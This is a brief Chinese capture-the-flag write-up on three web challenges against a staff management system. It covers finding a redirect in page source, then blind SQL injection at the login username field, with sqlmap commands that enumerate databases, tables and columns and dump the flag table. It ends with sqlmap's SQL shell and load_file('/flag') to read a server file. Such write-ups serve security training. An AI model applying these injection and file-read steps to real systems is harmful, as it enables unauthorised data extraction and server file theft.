人才(做的)管理系统 by hacked_1
查看源代码发现
登陆成功之后跳转
手动跳转一下 得到flag
人才(做的)管理系统 by hacked_2
注入点在登录界面的username
只能盲注
Sqlmap 启动
post注入 文件是sql5.txt
爆数据库:
python sqlmap.py -r "D:\Desktop\sql5.txt" -dbs
猜测flag在staff 接着爆表:
python sqlmap.py -r "D:\Desktop\sql5.txt" -D staff -tables
看到flag
继续
python sqlmap.py -r "D:\Desktop\sql4.txt" -D staff -T flag -columns
继续:
python sqlmap.py -r "D:\Desktop\sql4.txt" -D staff -T flag -C flag -dump
人才(做的)管理系统 by hacked_3
继续sqlmap梭
sqlmap.py -r "D:\Desktop\sql4.txt" --sql-shell
因为已知flag在根目录
直接利用load_file('/flag') 加载即可
select load_file('/flag')
最后出题人表示很赞...........
Comments | NOTHING